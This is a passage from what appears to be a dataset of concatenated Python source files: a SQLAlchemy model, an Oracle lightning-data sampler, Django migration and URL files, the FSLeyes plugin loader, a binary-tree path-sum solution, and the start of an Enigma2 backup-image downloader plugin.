            logger: object with logging calls

        Return:
            None
        """
        self._log = logger
        self._dal = data_access_layer
        self._user_id = user_id
23,442 | f657150e55efd281808500514e22e82154e8f104 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy import TypeDecorator
from sqlalchemy import types
from sqlalchemy import Column
from sqlalchemy import String
from sqlalchemy import Integer
from sqlalchemy import TIMESTAMP
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import BOOLEAN
from sqlalchemy import text
from sqlalchemy import DateTime
from model.base import *
__author__ = 'guoguangchuan'
class PublisherModel(Base):
    """ORM model for the ``publisher`` table."""
    __tablename__ = 'publisher'

    id = Column(Integer, primary_key=True)
    name = Column(String(30), nullable=False, server_default=text("''"), doc="发布方名称")
    brief_introduction = Column(String(50), nullable=False, server_default=text("''"), doc="发布方简介")
    logo = Column(String(50), nullable=False, server_default=text("''"), doc="发布方logo")
    address = Column(String(50), nullable=False, server_default=text("''"), doc="发布方办公地址")
    is_del = Column(BOOLEAN, nullable=False, server_default='0', doc="逻辑删除, true(删除)|false(未删除)")
    # update_time: set on INSERT and refreshed by the database on every UPDATE.
    update_time = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP"),
                         server_onupdate=text("CURRENT_TIMESTAMP"))
    # Bug fix: create_time previously had only server_onupdate (no value on
    # INSERT, and it changed on every UPDATE). A creation timestamp needs a
    # server-side default and must not change afterwards.
    create_time = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
23,443 | fdf1c50659e7a17aaea26389e80817ac1229432b | # -*- coding: utf-8 -*-
import time
import cx_Oracle, datetime
import math, numpy as np,random
import csv
from PIL import Image, ImageDraw, ImageFont
import sys
import os
# Python 2 only: re-expose setdefaultencoding (hidden by site.py) so the
# process-wide default encoding can be forced to UTF-8.
reload(sys)
sys.setdefaultencoding('utf8')
# Tell the Oracle client library which NLS locale/charset to use.
os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'
# Module-level shared connection; credentials are redacted placeholders
# (user, password, DSN).
connection = cx_Oracle.connect('*****', '*****', '*******/****')
#read_oracle
#read_oracle
def GetOracleDataSample(CenterLO, CenterLA, StartTime, EndTime, TimeStep,SampleTimecount, SampleCOunt, GridCount, Gridlen):
    """Sample lightning-strike features from Oracle into a training matrix.

    Builds a GridCount x GridCount grid of cells (each Gridlen degrees wide)
    centred on (CenterLO, CenterLA), queries per-cell strike counts and
    summed intensities binned into 6-minute windows, then draws SampleCOunt
    random time indices and assembles, per sample, SampleTimecount history
    steps x 2 features (count, intensity) per cell, each clipped/normalised
    to [0, 1]. Results are also saved to ./datamatrix.npy / ./datalabels.npy.

    Returns (samplematrix, samplelabels).
    """
    # Bounds of the central cell. NOTE(review): the last line uses CenterLO
    # where CenterLA looks intended; these four variables are never read
    # afterwards, so the bug is latent - confirm before relying on them.
    CenterGridStartlo = CenterLO - 0.5 * Gridlen
    CenterGridEndlo = CenterLO + 0.5 * Gridlen
    CenterGridStartla = CenterLA - 0.5 * Gridlen
    CenterGridEndla = CenterLO + 0.5 * Gridlen
    # South-west corner of the whole grid.
    GridStartla = CenterLA - 0.5 * Gridlen - int(GridCount / 2) * Gridlen
    GridStartl0 = CenterLO - 0.5 * Gridlen - int(GridCount / 2) * Gridlen
    # Flat index of the central cell (labels are derived from it).
    centergrididx=int(GridCount*GridCount/2)
    T_StartTime=datetime.datetime.strptime(StartTime, '%Y-%m-%d %H:%M:%S')
    T_EndTime = datetime.datetime.strptime(EndTime, '%Y-%m-%d %H:%M:%S')
    divtime=T_EndTime - T_StartTime
    # Number of TimeStep-minute windows between start and end.
    totalTimestep = int((divtime.total_seconds()) / (TimeStep *60))
    # Start at index 10 so every sample has enough history behind it.
    tmptimelist = list(range(10, totalTimestep))
    SampleTimeIndexs = random.sample(tmptimelist, SampleCOunt)
    ListAllGridData = {}
    # One row per sample: SampleTimecount steps x 2 features x all cells.
    samplematrix = [[0.0 for i in range(SampleTimecount*2*GridCount*GridCount)] for i in range(SampleCOunt)]
    samplelabels=[0.0 for i in range(SampleCOunt)]
    # Pass 1: query each grid cell's per-window count / summed intensity.
    for i in range(0, GridCount * GridCount):
        yidx = int(i / GridCount)
        xidx = int(i % GridCount)
        tmpstartLO=GridStartl0+xidx*Gridlen
        tmpstartLA=GridStartla+yidx*Gridlen
        tmpendLO=tmpstartLO+Gridlen
        tmpendLA=tmpstartLA+Gridlen
        # NOTE(review): a new cursor per cell is never closed, and the SQL is
        # built by string concatenation (safe only because inputs are
        # program-generated numbers/timestamps, not user input).
        cursor = connection.cursor()
        sql = r"select t.*,s.SUMINTENS from(select to_char(datetime,'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' time, count(*) count from thunder2015 where dateTime>to_date('" + StartTime + "','yyyy-mm-dd hh24:mi:ss') and dateTime<to_date('" + EndTime + "','yyyy-mm-dd hh24:mi:ss') and longitude>=" + str(tmpstartLO) + " and longitude<" + str(tmpendLO) + " and latitude>=" + str(tmpstartLA) + " and latitude<" + str(tmpendLA) + " group by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' order by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00') t left join (select to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' time, sum(abs(INTENS)) SUMINTENS from thunder2015 where dateTime>to_date('" + StartTime + "','yyyy-mm-dd hh24:mi:ss') and dateTime<to_date('" + EndTime + "','yyyy-mm-dd hh24:mi:ss') and longitude>=" + str(tmpstartLO) + " and longitude<" + str(tmpendLO) + " and latitude>=" + str( tmpstartLA) + " and latitude<" + str(tmpendLA) + " group by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' order by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00') s on t.time=s.time"
        # NOTE(review): strings are immutable - this strip chain discards its
        # result and has no effect.
        sql.strip().lstrip().rstrip(',')
        cursor.execute(sql)
        result = cursor.fetchall()
        GridInfos = {}
        for line in result:
            tmptime=line[0]
            tmpcount=line[1]
            tmpsumintens=line[2]
            GridInfos[tmptime]={'count':float(tmpcount),'sumintens':tmpsumintens}
        ListAllGridData[i]=GridInfos
    # Pass 2: assemble samples. Label = central-cell count at the sampled
    # window, clipped to 1.0 at 20 strikes.
    for j in range(0,len(SampleTimeIndexs)):
        tmpstarttime=T_StartTime+datetime.timedelta(minutes=SampleTimeIndexs[j]*TimeStep)
        if datetime.datetime.strftime(tmpstarttime, '%Y-%m-%d %H:%M:%S') in ListAllGridData[centergrididx].keys():
            if ListAllGridData[centergrididx][datetime.datetime.strftime(tmpstarttime, '%Y-%m-%d %H:%M:%S')]['count']>= 20:
                samplelabels[j]=1
            else:
                samplelabels[j]=ListAllGridData[centergrididx][datetime.datetime.strftime(tmpstarttime, '%Y-%m-%d %H:%M:%S')]['count']/20
        # History features: counts normalised by 20, intensities by 2000.
        for grididx in range(0,(GridCount*GridCount)):
            for timediv in range(0,SampleTimecount):
                tmpsamplestarttime=tmpstarttime-datetime.timedelta(minutes=(timediv+1)*TimeStep)
                if datetime.datetime.strftime(tmpsamplestarttime, '%Y-%m-%d %H:%M:%S') in ListAllGridData[grididx].keys():
                    samplematrix[j][grididx*SampleTimecount*2+timediv*2]=ListAllGridData[grididx][datetime.datetime.strftime(tmpsamplestarttime, '%Y-%m-%d %H:%M:%S')]['count']
                    samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2+1] = ListAllGridData[grididx][datetime.datetime.strftime(tmpsamplestarttime, '%Y-%m-%d %H:%M:%S')]['sumintens']
                    if samplematrix[j][grididx*SampleTimecount*2+timediv*2] >= 20:
                        samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2] = 1.0
                    else:
                        samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2] = \
                            samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2]/ 20
                    if samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2+1] >= 2000:
                        samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2 + 1] = 1.0
                    else:
                        samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2 + 1] = \
                            samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2 + 1] / 2000
    # Persist both matrix and labels as .npy side effects.
    numpy_list = np.asarray(samplematrix)
    np.save("./datamatrix", numpy_list)
    numpy_labellist = np.asarray(samplelabels)
    # NOTE(review): reshape returns a new array; this call's result is
    # discarded, so the saved labels stay 1-D.
    numpy_labellist.reshape(SampleCOunt,1)
    np.save("./datalabels", numpy_labellist)
    return samplematrix,samplelabels
|
23,444 | af9644e8066a95b9a6562cb9e394e2a6604ca689 | # Generated by Django 2.2.7 on 2019-11-19 14:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Widen Flight.arrival and Flight.departure to CharField(max_length=50)."""

    dependencies = [
        ('flights', '0002_flight_owner'),
    ]

    operations = [
        migrations.AlterField(
            model_name='flight',
            name='arrival',
            field=models.CharField(max_length=50),
        ),
        migrations.AlterField(
            model_name='flight',
            name='departure',
            field=models.CharField(max_length=50),
        ),
    ]
|
23,445 | c9c81d04f5f857e598c77eb4af277ab9733ab5fb | from django.urls import path
from django.conf.urls import url
from . import views
# URL routing: collection endpoints via path(), detail endpoints via regex
# url() patterns capturing numeric ids.
urlpatterns = [
    path('categories/', views.CategoriesAPIView.as_view(), name='categories'),
    path('levels/', views.LevelsAPIView.as_view(), name='levels'),
    path('themes/', views.ThemesAPIView.as_view(), name='themes'),
    url(r'^themes/(?P<theme_id>[0-9]+)/$', views.ThemeAPIView.as_view(), name='theme'),
    url(r'^words/(?P<word_id>[0-9]+)/$', views.WordAPIView.as_view(), name='word')
]
|
23,446 | acee6552f46e888e5d6d7f884b54c35eb765fc82 | #!/usr/bin/env python
#
# plugins.py - Accessing installed FSLeyes plugins.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module provides access to installed FSLeyes plugins.
FSLeyes uses a simple plugin architecture for loading custom views, controls,
and tools. Plugins can be installed from Python libraries (e.g. as hosted on
`PyPi <https://pypi.org/>`_), or installed directly from a ``.py`` file.
In both cases, FSLeyes uses ``setuptools`` `entry points
<https://setuptools.readthedocs.io/en/latest/pkg_resources.html#entry-points>`_
to locate the items provided by plugin library/files.
Things plugins can provide
--------------------------
FSLeyes plugins can provide custom *views*, *controls* and *tools*:
- A *view* is a top level panel, such as an :class:`.OrthoPanel`,
:class:`.Scene3DPanel`, or :class:`.TimeSeriesPanel`. Views provided
by plugins are added to the top level *Views* menu.
- A *control* is a secondary panel, or toolbar, which is embedded within a
view, such as an :class:`.OverlayListPanel`, :class:`.OrthoToolBar`, or
:class:`.MelodicClassificationPanel`. Controls provided by plugins are
added to the *Settings* menu for each active view.
- A *tool* is an :class:`.Action` which is associated with a menu item
under the top-level *Tools* menu, such as the :class:`.ApplyFlirtXfmAction`
and the :class:`.ResampleAction`.
Loading/installing FSLeyes plugins
----------------------------------
FSLeyes plugins are loaded into a running FSLeyes as follows:
 - Any Python libraries (e.g. installed from ``PyPi``) which are present in the
   environment that FSLeyes is running in, and which have a name beginning
   with ``fsleyes-plugin-`` will automatically be detected by FSLeyes.
- Plugin ``.py`` files, which contain view, control, and/or tool definitions,
can be passed directly to the :func:`loadPlugin` function.
- Plugin ``.py`` files which are present in the FSLeyes settings directory,
or which are found in the ``FSLEYES_PLUGIN_PATH`` environment variable, will
be loaded by the :func:`initialise` function.
A plugin can be installed permanently into FSLeyes as follows:
 - Any Python libraries (e.g. installed from ``PyPi``) which are present in the
   environment that FSLeyes is running in, and which have a name beginning
   with ``fsleyes-plugin-`` will automatically be detected by FSLeyes.
- ``.py`` plugin files can be passed to the :func:`installPlugin`
function. This file will be saved into the FSLeyes settings directory
(e.g. ``~/.fsleyes/plugins/``).
Writing a FSLeyes plugin
------------------------
.. note:: A minimal example of a FSLeyes plugin library can be found in
``tests/testdata/fsleyes_plugin_example/``.
A FSLeyes plugin is a Python library, or a ``.py`` file, which contains
definitions for custom views, controls, and tools.
- Views must be sub-classes of the :class:`.ViewPanel` class.
- Controls must be sub-classes of the :class:`.ControlPanel` class. If your
custom control is designed to only work with a specific view, you should
override the :mod:`.ControlMixin.supportedViews` static method to return
the views that your control supports.
- Tools must be sub-classes of the :class:`.Action` class.
To write a ``.py`` file which can be loaded as a FSLeyes plugin, simply
define your views, controls, and tools in the file. The file path can then
be passed to the :func:`loadPlugin` or :func:`installPlugin` function.
To release a FSLeyes plugin as a library, you need to organise your code
as a Python library. Minimally, this requires the following:
- Arrange your ``.py`` file(s) into a Python package.
- Write a ``setup.py`` file.
- Give your library a name (the ``name`` argument to the ``setup``
function) which begins with ``'fsleyes-plugin-``.
- Expose your custom views, controls, and tools as `entry points
<https://packaging.python.org/specifications/entry-points/>`_ (the
``entry_points`` argument to the ``setup`` function).
A minimal ``setup.py`` file for a FSLeyes plugin might look like this:
```
import setuptools
setup(
# the name must begin with "fsleyes-plugin-"
name='fsleyes-plugin-my-cool-plugin',
# Views, controls, and tools must be exposed
# as entry points within groups called
# "fsleyes_views", "fsleyes_controls" and
# "fsleyes_tools" respectively.
        entry_points={
            'fsleyes_views' : [
                'My cool view = myplugin:MyView'
            ],
            'fsleyes_controls' : [
                'My cool control = myplugin:MyControl'
            ],
            'fsleyes_tools' : [
                'My cool tool = myplugin:MyTool'
            ]
        }
)
```
See the `Python Packaging guide
<https://packaging.python.org/tutorials/packaging-projects/>`_ for more
details on writing a ``setup.py`` file.
Module contents
---------------
The following functions can be used to load/install new plugins:
.. autosummary::
:nosignatures:
initialise
loadPlugin
installPlugin
The following functions can be used to access plugins:
.. autosummary::
:nosignatures:
listPlugins
listViews
listControls
listTools
"""
import os.path as op
import os
import sys
import glob
import logging
import collections
import pkg_resources
import fsl.utils.settings as fslsettings
import fsleyes.actions as actions
import fsleyes.views.viewpanel as viewpanel
import fsleyes.controls.controlpanel as ctrlpanel
log = logging.getLogger(__name__)
def initialise():
    """Calls :func:`loadPlugin` on all plugin files in the FSLeyes settings
    directory, and found on the ``FSLEYES_PLUGIN_PATH`` environment variable.
    """
    # Candidate .py files from the settings directory...
    candidates = [fslsettings.filePath(p)
                  for p in fslsettings.listFiles('plugins/*.py')]
    # ...plus every .py file on FSLEYES_PLUGIN_PATH.
    fpp = os.environ.get('FSLEYES_PLUGIN_PATH', None)
    if fpp is not None:
        for dirname in fpp.split(op.pathsep):
            candidates.extend(glob.glob(op.join(dirname, '*.py')))
    for fname in candidates:
        try:
            loadPlugin(fname)
        except Exception as e:
            log.warning('Failed to load plugin file %s: %s', fname, e)
def listPlugins():
    """Returns a list containing the names of all installed FSLeyes plugins.
    """
    names = [dist.project_name
             for dist in pkg_resources.working_set
             if dist.project_name.startswith('fsleyes-plugin-')]
    return sorted(names)
def _listEntryPoints(group):
    """Returns a dictionary containing ``{name : type}`` entry points for the
    given entry point group.
    https://setuptools.readthedocs.io/en/latest/pkg_resources.html#entry-points
    """
    items = collections.OrderedDict()
    for plugin in listPlugins():
        entries = pkg_resources.get_entry_map(plugin, group)
        for name, point in entries.items():
            # Later plugins win on name clashes.
            if name in items:
                log.debug('Overriding entry point %s [%s] with entry point '
                          'of the same name from %s', name, group, plugin)
            items[name] = point.load()
    return items
def listViews():
    """Returns a dictionary of ``{name : ViewPanel}`` mappings containing
    the custom views provided by all installed FSLeyes plugins.
    """
    views = _listEntryPoints('fsleyes_views')
    # Discard anything that is not actually a ViewPanel sub-class.
    for name in list(views.keys()):
        if not issubclass(views[name], viewpanel.ViewPanel):
            log.debug('Ignoring fsleyes_views entry point '
                      '{} - not a ViewPanel'.format(name))
            del views[name]
    return views
def listControls(viewType=None):
    """Returns a dictionary of ``{name : ControlPanel}`` mappings containing
    the custom controls provided by all installed FSLeyes plugins.

    :arg viewType: Sub-class of :class:`.ViewPanel` - if provided, only
                   controls which are compatible with this view type are
                   returned (as determined by
                   :meth:`.ControlMixin.supportedViews.`).
    """
    ctrls = _listEntryPoints('fsleyes_controls')
    for name in list(ctrls.keys()):
        cls = ctrls[name]
        # Discard entries that are not control panels/toolbars at all.
        if not issubclass(cls, (ctrlpanel.ControlPanel,
                                ctrlpanel.ControlToolBar)):
            log.debug('Ignoring fsleyes_controls entry point {} - '
                      'not a ControlPanel/ToolBar'.format(name))
            del ctrls[name]
            continue
        # Optionally filter by view compatibility.
        supported = cls.supportedViews()
        if viewType is not None and \
           supported is not None and \
           viewType not in supported:
            del ctrls[name]
    return ctrls
def listTools():
    """Returns a dictionary of ``{name : Action}`` mappings containing
    the custom tools provided by all installed FSLeyes plugins.
    """
    tools = _listEntryPoints('fsleyes_tools')
    # Discard anything that is not an Action sub-class.
    for name in list(tools.keys()):
        if not issubclass(tools[name], actions.Action):
            log.debug('Ignoring fsleyes_tools entry point '
                      '{} - not an Action'.format(name))
            del tools[name]
    return tools
def _findEntryPoints(filename, modname):
    """Used by :func:`loadPlugin`. Imports the given Python file (setting the
    module name to ``modname``), and finds the FSLeyes entry points (views,
    controls, or tools) that are defined within.

    Returns a ``{group : {name : type}}`` dict with groups named
    ``fsleyes_views`` / ``fsleyes_controls`` / ``fsleyes_tools``.
    """
    log.debug('Importing %s as %s', filename, modname)
    entryPoints = collections.defaultdict(dict)
    pyver       = sys.version_info[:2]
    # Ugh.
    # Three import mechanisms for three Python version ranges.
    if pyver >= (3, 5):
        import importlib.util as imputil
        spec = imputil.spec_from_file_location(modname, filename)
        mod  = imputil.module_from_spec(spec)
        spec.loader.exec_module(mod)
    elif pyver == (3, 4):
        from importlib.machinery import SourceFileLoader
        mod = SourceFileLoader(modname, filename).load_module()
    else:
        import imp
        mod = imp.load_source(modname, filename)
    # Register the module so later "<modname>:<name>" entry-point strings
    # (see loadPlugin) can resolve it.
    sys.modules[modname] = mod
    # Classify every class defined (or imported) at module level.
    for name in dir(mod):
        item  = getattr(mod, name)
        group = None
        if not isinstance(item, type):
            continue
        if   issubclass(item, viewpanel.ViewPanel):    group = 'views'
        elif issubclass(item, ctrlpanel.ControlPanel): group = 'controls'
        elif issubclass(item, actions.Action):         group = 'tools'
        if group is not None:
            log.debug('Found %s entry point: %s', group, name)
            entryPoints['fsleyes_{}'.format(group)][name] = item
    return entryPoints
def loadPlugin(filename):
    """Loads the given Python file as a FSLeyes plugin.

    Creates an in-memory ``pkg_resources.Distribution`` named
    ``fsleyes-plugin-<stem>`` whose entry points are the views/controls/tools
    found in the file, and adds it to the working set so the ``list*``
    functions in this module can discover them. Does nothing if a
    distribution of that name is already present.
    """
    name     = op.splitext(op.basename(filename))[0]
    modname  = 'fsleyes_plugin_{}'.format(name)
    distname = 'fsleyes-plugin-{}'.format(name)
    if distname in listPlugins():
        log.debug('Plugin %s is already in environment - skipping', distname)
        return
    log.debug('Loading plugin %s [dist name %s]', filename, distname)
    dist = pkg_resources.Distribution(
        project_name=distname,
        location=op.dirname(filename),
        version='0.0.0')
    entryPoints = _findEntryPoints(filename, modname)
    # Here I'm relying on the fact that
    # Distribution.get_entry_map returns
    # the actual dict that it uses to
    # store entry points.
    entryMap = dist.get_entry_map()
    for group, entries in entryPoints.items():
        entryMap[group] = {}
        for name, item in entries.items():
            # "name = module:attribute" entry-point syntax.
            ep = '{} = {}:{}'.format(name, modname, name)
            ep = pkg_resources.EntryPoint.parse(ep, dist=dist)
            entryMap[group][name] = ep
    pkg_resources.working_set.add(dist)
def installPlugin(filename):
    """Copies the given Python file into the FSLeyes settings directory,
    within a sub-directory called ``plugins``. After the file has been
    copied, the path to the copy is passed to :func:`loadPlugin`.
    """
    stem = op.splitext(op.basename(filename))[0]
    dest = 'plugins/{}.py'.format(stem)
    log.debug('Installing plugin %s', filename)
    # Read the whole source file, then write it into the settings store.
    with open(filename, 'rt') as src:
        contents = src.read()
    with fslsettings.writeFile(dest) as sink:
        sink.write(contents)
    dest = fslsettings.filePath(dest)
    # If the copy cannot be loaded, remove it again.
    try:
        loadPlugin(dest)
    except Exception:
        fslsettings.deleteFile(dest)
        raise
|
23,447 | eb9e9e1f69503d90b15f28224d508fb48a3f2f4e | # coding:utf-8
'''
@Copyright:LintCode
@Author: hanqiao
@Problem: http://www.lintcode.com/problem/binary-tree-maximum-path-sum
@Language: Python
@Datetime: 16-05-19 03:43
'''
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
    """
    @param root: The root of binary tree.
    @return: An integer
    """
    def maxPathSum(self, root):
        """Return the maximum path sum; a path may start and end anywhere."""
        maxsum, _ = self.helper(root)
        return maxsum

    def helper(self, root):
        """Return (best path sum in this subtree, best downward chain ending
        at root, floored at 0).

        Bug fix: the original referenced ``sys.maxint`` without importing
        ``sys`` (NameError), and ``maxint`` does not exist on Python 3;
        ``float('-inf')`` is the portable sentinel.
        """
        if root is None:
            return float('-inf'), 0
        left = self.helper(root.left)
        right = self.helper(root.right)
        # Best single downward chain through root; an empty chain counts as 0.
        single = max(left[1] + root.val, right[1] + root.val, 0)
        # Best complete path so far: entirely in a subtree, or bending here.
        maxpath = max(left[0], right[0], left[1] + right[1] + root.val)
        return maxpath, single
|
23,448 | 85befc07111b9003c0ee8b604abadff332ec2f86 | from Plugins.Plugin import PluginDescriptor
from Screens.Console import Console
from Screens.ChoiceBox import ChoiceBox
from Screens.Screen import Screen
from Screens.InputBox import InputBox
from Screens.HelpMenu import HelpableScreen
from Components.GUIComponent import *
from Components.HTMLComponent import *
from Components.Button import Button
from Components.MenuList import MenuList
from Components.Label import Label
from Components.ActionMap import ActionMap, NumberActionMap, HelpableActionMap
from Components.ProgressBar import ProgressBar
from Components.Input import Input
from Components.ScrollLabel import ScrollLabel
from Components.Pixmap import Pixmap
from Components.Label import Label
from Components.Sources.List import List
from Components.Sources.StaticText import StaticText
from Components.FileList import FileList
from Components.Slider import Slider
from Components.Harddisk import harddiskmanager
from Components.config import getConfigListEntry, ConfigSubsection, ConfigText, ConfigLocations
from Components.config import config, ConfigSelection, ConfigBoolean, ConfigYesNo
from Components.config import getConfigListEntry, configfile
from Components.ConfigList import ConfigListScreen
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.SelectionList import SelectionList
from Components.PluginComponent import plugins
from Components.AVSwitch import AVSwitch
from twisted.web.client import downloadPage, getPage
from socket import gethostbyname
from xml.dom.minidom import parse, getDOMImplementation
from xml.dom import Node, minidom
from Tools.Directories import *
from Tools.Directories import pathExists, fileExists, resolveFilename, SCOPE_PLUGINS, SCOPE_CURRENT_PLUGIN, SCOPE_CURRENT_SKIN, SCOPE_METADIR, SCOPE_MEDIA, SCOPE_LANGUAGE
from Tools.LoadPixmap import LoadPixmap
from enigma import eConsoleAppContainer, loadPNG, eTimer, quitMainloop, RT_HALIGN_LEFT, RT_VALIGN_CENTER, eListboxPythonMultiContent, eListbox, gFont, getDesktop
from cPickle import dump, load
from os import path as os_path, system as os_system, unlink, stat, mkdir, popen, makedirs, listdir, access, rename, remove, W_OK, R_OK, F_OK
from os import environ, system, path, listdir, remove
from time import time, gmtime, strftime, localtime
from stat import ST_MTIME
from image_viewer import ScreenBox
import datetime
import urllib2
import gettext
import os
# Persistent plugin settings, stored via enigma2's config framework.
config.plugins.ImageDownLoader2 = ConfigSubsection()
config.plugins.ImageDownLoader2.addstr = ConfigText(default='tsimage')
config.plugins.ImageDownLoader2.Downloadlocation = ConfigText(default='/media/', visible_width=50, fixed_size=False)
config.plugins.ImageDownLoader2.log = ConfigText(default='2> /tmp/ImageDownLoaderLog >&1')
config.plugins.ImageDownLoader2.debug = ConfigText(default='debugon')
# Swap-file size selection (MB) used while flashing.
config.plugins.ImageDownLoader2.swap = ConfigSelection([('auto', 'auto'),
 ('128', '128 MB'),
 ('256', '256 MB'),
 ('512', '512 MB'),
 ('0', 'off')], default='auto')
config.plugins.ImageDownLoader2.swapsize = ConfigText(default='128')
config.plugins.ImageDownLoader2.disclaimer = ConfigBoolean(default=True)
config.plugins.ImageDownLoader2.update = ConfigYesNo(default=False)
mounted_string = 'Nothing mounted at '
# Desktop width decides which skin variant (HD vs FHD) the screens load.
dwidth = getDesktop(0).size().width()
currversion = 'eo2.0'
# Snapshot of currently mounted partitions: (mountpoint, description).
# NOTE(review): this loop calls _() before the module's own def _ below;
# it presumably resolves via a name injected by an earlier star-import -
# confirm, otherwise this raises NameError at import time.
mountedDevs = []
for p in harddiskmanager.getMountedPartitions(True):
    mountedDevs.append((p.mountpoint, _(p.description) if p.description else ''))
def _(txt):
    """Translate *txt* via the plugin's gettext domain, falling back to the
    global catalogue (and ultimately to the untranslated text)."""
    translated = gettext.dgettext('ImageDownLoader', txt)
    if translated == txt:
        translated = gettext.gettext(txt)
    return translated
def getDownloadPath():
    """Return the configured download location, always with a trailing '/'."""
    location = config.plugins.ImageDownLoader2.Downloadlocation.value
    if not location.endswith('/'):
        location = location + '/'
    return location
def freespace():
    """Return the free space (in MB, rounded to 2 decimals) at the configured
    download location, or 0 if the location cannot be examined.
    """
    downloadlocation = getDownloadPath()
    try:
        diskSpace = os.statvfs(downloadlocation)
    except OSError:
        # Path missing / not mounted: report no space rather than crash.
        # (Previously a bare except; narrowed to the error statvfs raises.)
        return 0
    # Bytes available to unprivileged users, converted to mebibytes.
    available = float(diskSpace.f_bsize * diskSpace.f_bavail)
    return round(float(available / 1048576.0), 2)
class buFeeds(Screen):
    """Screen listing the available backup-image feeds; picking one opens
    the :class:`Servers` screen for that feed."""

    def __init__(self, session):
        self.session = session
        # Pick the skin XML matching the desktop resolution.
        if dwidth == 1280:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/feedsHD.xml'
        else:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/feedsFHD.xml'
        f = open(skin, 'r')
        self.skin = f.read()
        f.close()
        Screen.__init__(self, session)
        # Parallel lists: display name at index i maps to URL at index i.
        self.serversnames = []
        self.serversurls = []
        self['ButtonRedtext'] = Label(_('Exit'))
        self['ButtonGreentext'] = Label(_('Please select ...'))
        if currversion == 'eo2.0':
            self.serversnames = ['</ zvonko67',
             '</ G_ogi',
             '</ dragec11',
             '</ jopidane',
             '</ mika (www.satelitin.com)']
            self.serversurls = ['http://178.63.156.75/BackUpImages/zvonko67/',
             'http://178.63.156.75/BackUpImages/G_ogi/',
             'http://178.63.156.75/BackUpImages/dragec11/',
             'http://178.63.156.75/BackUpImages/jopidane/',
             'http://178.63.156.75/BackUpImages/mika/']
        self.list = []
        self['text'] = MenuList([], True, eListboxPythonMultiContent)
        self.addon = 'emu'
        self.icount = 0
        self.downloading = False
        self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'ok': self.okClicked,
         'red': self.close,
         'green': self.okClicked,
         'cancel': self.close}, -2)
        self.ListToMulticontent()

    def ListToMulticontent(self):
        """Render self.serversnames into the multi-content list widget,
        sized for the current desktop resolution."""
        res = []
        theevents = []
        self.events = []
        self.events = self.serversnames
        if dwidth == 1280:
            self['text'].l.setItemHeight(34)
            self['text'].l.setFont(0, gFont('Sansation-Bold', 24))
            for i in range(0, len(self.events)):
                res.append(MultiContentEntryText(pos=(0, 5), size=(2, 35), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryText(pos=(30, 2), size=(720, 35), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
                theevents.append(res)
                res = []
        else:
            self['text'].l.setItemHeight(50)
            self['text'].l.setFont(0, gFont('Sansation-Bold', 40))
            for i in range(0, len(self.events)):
                res.append(MultiContentEntryText(pos=(0, 5), size=(2, 50), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryText(pos=(30, 2), size=(720, 50), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
                theevents.append(res)
                res = []
        self['text'].l.setList(theevents)
        self['text'].show()

    def okClicked(self):
        # Open the Servers screen for the highlighted feed.
        cindex = self['text'].getSelectionIndex()
        selectedservername = self.serversnames[cindex]
        selectedserverurl = self.serversurls[cindex]
        self.session.open(Servers, selectedservername, selectedserverurl)
class Servers(Screen):
    """Second screen: lists the receiver-model groups published by the
    chosen server and opens ``Images`` for the selected group."""

    def __init__(self, session, selectedservername = None, selectedserverurl = None):
        self.session = session
        # Pick the HD or FHD skin variant based on the detected display width.
        if dwidth == 1280:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/serversHD.xml'
        else:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/serversFHD.xml'
        f = open(skin, 'r')
        self.skin = f.read()
        f.close()
        Screen.__init__(self, session)
        self.selectedservername = selectedservername
        self.rooturl = selectedserverurl
        self['ButtonRedtext'] = Label(_('Exit'))
        self['ButtonGreentext'] = Label(_('Please select ...'))
        self.newsurl = ''
        self.list = []
        self['list'] = MenuList([], True, eListboxPythonMultiContent)
        self.addon = 'emu'
        self.icount = 0
        self.searchstr = None
        self.downloading = False
        self.data = []
        # Each known maintainer publishes images for a fixed set of receiver
        # models; the group name doubles as the sub-directory of rooturl.
        if self.selectedservername == '</ zvonko67':
            self.groups = ['VuPlus_Solo2']
            self.downloading = True
        if self.selectedservername == '</ G_ogi':
            self.groups = ['VuPlus_Uno4K', 'VuPlus_SoloSEv2', 'DM_520HD']
            self.downloading = True
        if self.selectedservername == '</ dragec11':
            self.groups = ['DM_800HDse', 'VuPlus_Zero4K']
            self.downloading = True
        if self.selectedservername == '</ jopidane':
